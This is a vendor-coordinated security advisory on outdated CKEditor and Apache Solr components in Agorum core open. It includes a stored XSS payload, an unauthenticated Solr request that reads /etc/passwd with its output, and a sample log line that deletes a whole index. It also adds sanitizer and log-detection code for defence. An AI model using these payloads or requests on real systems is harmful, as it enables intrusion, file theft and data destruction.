usd-2025-0029 | Agorum core open 11.9.1.3-1857 - Dependency on Vulnerable Third-Party Component

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Dependency on Vulnerable Third-Party Component (CWE-1395)
Security Risk: Critical
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0029

Description

Agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Proof of Concept

The application depends on third-party components that contain known and exploitable vulnerabilities.
Below are two examples of such vulnerable components, each with known public CVEs and documented exploit paths.

CKEditor 4.6.2 - CVE-2024-24816

CKEditor 4 < 4.24.0-lts - XSS vulnerability in samples that use the "preview" feature.
https://github.com/afine-com/CVE-2024-24816

Agorum core integrates CKEditor for its built-in mail functionality, which introduces a stored cross-site scripting and privilege escalation risk. A low-privileged user could craft an email containing malicious JavaScript and send it to an administrative user. If the administrative user opens the email and follows the embedded link, the JavaScript executes within the context of their browser session, i.e. with the administrator's privileges.

The following payload can be used to craft a malicious mail:

<p>&gt;</p><p><a href="javascript:alert(document.domain)">XSS</a></p><p>&nbsp;</p>
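The payload above relies on a link target with the javascript: scheme, so a sanitizer that only looks for <script> tags or on* handlers does not catch it. The following Python is an added example, not code from agorum or CKEditor: it normalises a link target the way a browser does before parsing the scheme (entity decoding, removal of ASCII control characters and whitespace, case folding), so that obfuscated variants such as "java\tscript:" or "&#106;avascript:" are recognised as well, and re-serialises a mail body with such attributes removed. The class and function names are ours, and the sample input is the advisory's own payload.

```python
import html
import re
from html.parser import HTMLParser

# URL schemes that run script (or smuggle arbitrary content) when used as a
# link target. Anything else is treated as a plain navigation target.
DANGEROUS_SCHEMES = {"javascript", "vbscript", "data"}

# Browsers strip ASCII control characters and whitespace from a URL before
# parsing its scheme, so "java\tscript:" and "\njavascript:" still execute.
_IGNORED_BY_BROWSER = re.compile(r"[\x00-\x20\x7f]")


def normalize_href(href: str) -> str:
    """Decode HTML entities and drop the characters a browser ignores before it
    parses the scheme, so obfuscated variants compare equal to the plain one."""
    decoded = html.unescape(href)
    return _IGNORED_BY_BROWSER.sub("", decoded).lower()


def is_dangerous_href(href: str) -> bool:
    """True if the link target's scheme is one that executes script."""
    scheme, has_scheme, _ = normalize_href(href).partition(":")
    return bool(has_scheme) and scheme in DANGEROUS_SCHEMES


class MailHtmlSanitizer(HTMLParser):
    """Re-serialises mail HTML, dropping URL-bearing attributes whose scheme is
    dangerous. Only link targets are handled here (hypothetical helper for this
    example); a production sanitizer would additionally enforce a tag and
    attribute allow-list (no <script>, no on* handlers)."""

    URL_ATTRIBUTES = {"href", "src", "action", "formaction"}

    def __init__(self):
        # Keep entity references as written so "&gt;" and "&nbsp;" in the
        # original mail survive the round trip unchanged.
        super().__init__(convert_charrefs=False)
        self.out = []
        self.dropped = []  # (tag, attribute, value) of every removed link target

    def _render_attrs(self, tag, attrs):
        parts = []
        for name, value in attrs:
            if (value is not None and name.lower() in self.URL_ATTRIBUTES
                    and is_dangerous_href(value)):
                self.dropped.append((tag, name, value))
                continue
            if value is None:
                parts.append(f" {name}")
            else:
                parts.append(f' {name}="{html.escape(value, quote=True)}"')
        return "".join(parts)

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(tag, attrs)}/>")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize_mail_html(document: str):
    """Return (sanitized_html, dropped_attributes) for one mail body."""
    parser = MailHtmlSanitizer()
    parser.feed(document)
    parser.close()
    return "".join(parser.out), parser.dropped


# Sample input: the payload from the advisory above.
ADVISORY_PAYLOAD = (
    '<p>&gt;</p><p><a href="javascript:alert(document.domain)">XSS</a></p>'
    '<p>&nbsp;</p>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_mail_html(ADVISORY_PAYLOAD)
    print(clean)    # the <a> element survives, its href does not
    print(dropped)  # [('a', 'href', 'javascript:alert(document.domain)')]
```

Running the block on the advisory payload yields <p>&gt;</p><p><a>XSS</a></p><p>&nbsp;</p>. The normalisation step is the part worth keeping: a check that compares the raw attribute value against "javascript:" is bypassed by a tab inside the scheme or by a numeric entity, both of which browsers accept.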

Apache Solr 7.7.2 - Arbitrary File Read

The application uses an outdated version of Apache Solr, which contains several known vulnerabilities. Additionally, Apache Solr is configured to allow unauthenticated access.
For instance, an unauthenticated attacker could gain access to arbitrary system files by sending the following request to the Apache Solr server:

GET /solr/agorumsolr01_shard1_replica_n1/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
Host: localhost:8981
[...]

The response reveals the content of /etc/passwd, as shown below:

HTTP/1.1 200 OK
Content-Type: application/json;charset=utf-8
Content-Length: 4123

{
  "responseHeader":{
    "status":0,
    "QTime":2,
    "handler":"org.apache.solr.handler.DumpRequestHandler",
    "params":{
      "param":"ContentStream",
      "stream.url":"file:///etc/passwd"}},
  "params":{
    "stream.url":"file:///etc/passwd",
    "echoHandler":"true",
    "param":"ContentStream",
    "echoParams":"explicit"},
  "streams":[{
    "name":null,
    "sourceInfo":"url",
    "size":null,
    "contentType":null,
    "stream":"root:x:0:0:root:/root:/usr/bin/zsh[...]
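The file read works because Solr's remote streaming feature fetches whatever stream.url (or stream.file) names on the caller's behalf and, on the DumpRequestHandler, echoes it back. The following Python is an added example, not code from agorum or Apache Solr: it builds the verification request for a given core, extracts the echoed stream from a DumpRequestHandler response, and flags every request in solr.log that used one of the stream.* parameters, which is what a detection rule for this class of request should key on. The core name is the one from the advisory, the response sample is an abridged copy of the one above, and the log lines are constructed to approximate Solr's request log format; the function names are ours.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

# Request parameters through which Solr's content-stream machinery fetches
# data on the caller's behalf: a remote or local URL, a server-side file, or
# the request body itself. Any handler that accepts content streams is
# reachable this way, not only /debug/dump.
STREAM_PARAMS = ("stream.url", "stream.file", "stream.body")


def build_dump_request(core: str, target: str) -> str:
    """Build the request path that asks DumpRequestHandler to echo back the
    content of `target`. Used to verify whether remote streaming is enabled."""
    query = urlencode({"stream.url": target, "param": "ContentStream"})
    return f"/solr/{core}/debug/dump?{query}"


def leaked_streams(response_body: str):
    """Return [(source, content)] for every content stream the server fetched
    and echoed back, from a DumpRequestHandler JSON response."""
    data = json.loads(response_body)
    return [
        (stream.get("sourceInfo"), stream["stream"])
        for stream in data.get("streams", [])
        if stream.get("stream")
    ]


# Matches the path/params portion of a request line in solr.log
# (format approximated for this example).
_REQUEST_LOG = re.compile(r"path=(?P<path>\S+) params=\{(?P<params>[^}]*)\}")


def flag_remote_streaming(log_lines):
    """Yield (path, parameter, value) for every logged request that used one
    of the stream.* parameters. A file: URL is the local-file-read case."""
    for line in log_lines:
        match = _REQUEST_LOG.search(line)
        if not match:
            continue
        params = parse_qs(match.group("params"), keep_blank_values=True)
        for name in STREAM_PARAMS:
            for value in params.get(name, []):
                yield match.group("path"), name, value


# Constructed sample data: an abridged copy of the advisory's response and
# three solr.log-style request lines written for this example.
SAMPLE_RESPONSE = json.dumps({
    "responseHeader": {"status": 0, "QTime": 2,
                       "handler": "org.apache.solr.handler.DumpRequestHandler",
                       "params": {"param": "ContentStream",
                                  "stream.url": "file:///etc/passwd"}},
    "params": {"stream.url": "file:///etc/passwd", "echoHandler": "true",
               "param": "ContentStream", "echoParams": "explicit"},
    "streams": [{"name": None, "sourceInfo": "url", "size": None,
                 "contentType": None,
                 "stream": "root:x:0:0:root:/root:/usr/bin/zsh"}],
})

SAMPLE_LOG = [
    "2025-05-05 10:14:02.111 INFO  (qtp1-17) [c:agorumsolr01 s:shard1 r:core_node2 "
    "x:agorumsolr01_shard1_replica_n1] o.a.s.c.S.Request "
    "[agorumsolr01_shard1_replica_n1]  webapp=/solr path=/select "
    "params={q=*:*&wt=json} status=0 QTime=3",
    "2025-05-05 10:14:09.480 INFO  (qtp1-21) [c:agorumsolr01 s:shard1 r:core_node2 "
    "x:agorumsolr01_shard1_replica_n1] o.a.s.c.S.Request "
    "[agorumsolr01_shard1_replica_n1]  webapp=/solr path=/debug/dump "
    "params={param=ContentStream&stream.url=file:///etc/passwd} status=0 QTime=2",
    "2025-05-05 10:15:33.002 INFO  (qtp1-23) [c:agorumsolr01 s:shard1 r:core_node2 "
    "x:agorumsolr01_shard1_replica_n1] o.a.s.c.S.Request "
    "[agorumsolr01_shard1_replica_n1]  webapp=/solr path=/update "
    "params={stream.body=<delete><query>*:*</query></delete>&commit=true} "
    "status=0 QTime=15",
]

if __name__ == "__main__":
    print(build_dump_request("agorumsolr01_shard1_replica_n1", "file:///etc/passwd"))
    print(leaked_streams(SAMPLE_RESPONSE))
    for hit in flag_remote_streaming(SAMPLE_LOG):
        print("remote streaming used:", hit)
```

Two points for whoever operates the Solr instance: the detection deliberately keys on the parameter names rather than on /debug/dump, because stream.url and stream.file are honoured by every handler that accepts content streams, and the third sample line shows stream.body being used to wipe an index through /update. The fix on the Solr side is to disable remote streaming in solrconfig.xml (the enableRemoteStreaming attribute of <requestParsers> in the 7.x configuration) and to stop exposing the Solr endpoint without authentication, independently of the version upgrade.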

These two exploits serve as simple demonstrations of how outdated components can be leveraged for immediate attacks. However, the core issue lies in the use of outdated third-party libraries, which inherently expose the application to numerous known vulnerabilities. Addressing these outdated dependencies is crucial to mitigating a wide range of potential threats beyond just these examples.

Fix


It is essential to regularly update and patch third-party components and libraries. This includes performing vulnerability assessments to identify outdated or unsupported dependencies and replacing them with secure, up-to-date versions. Automated dependency checkers or vulnerability scanners can help proactively identify and address these issues, and a Software Bill of Materials (SBOM) makes it possible to track and audit all third-party components and their versions in use.

For the two components shown above this means upgrading CKEditor 4 to 4.24.0-lts or later and upgrading Apache Solr to a supported release. Independently of the Solr version, the Solr endpoint should not be reachable without authentication, and remote streaming (the stream.url and stream.file parameters) should be disabled unless it is actually required.

Users of agorum core open can upgrade to 11.9.2 or 11.10.1.

References

Timeline

  • 2025-05-05: First contact request via mail.
  • 2025-05-05: The vendor has confirmed receipt of the report and has begun investigating the matter.
  • 2025-05-07: The vendor has begun addressing and fixing the issue.
  • 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
  • 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.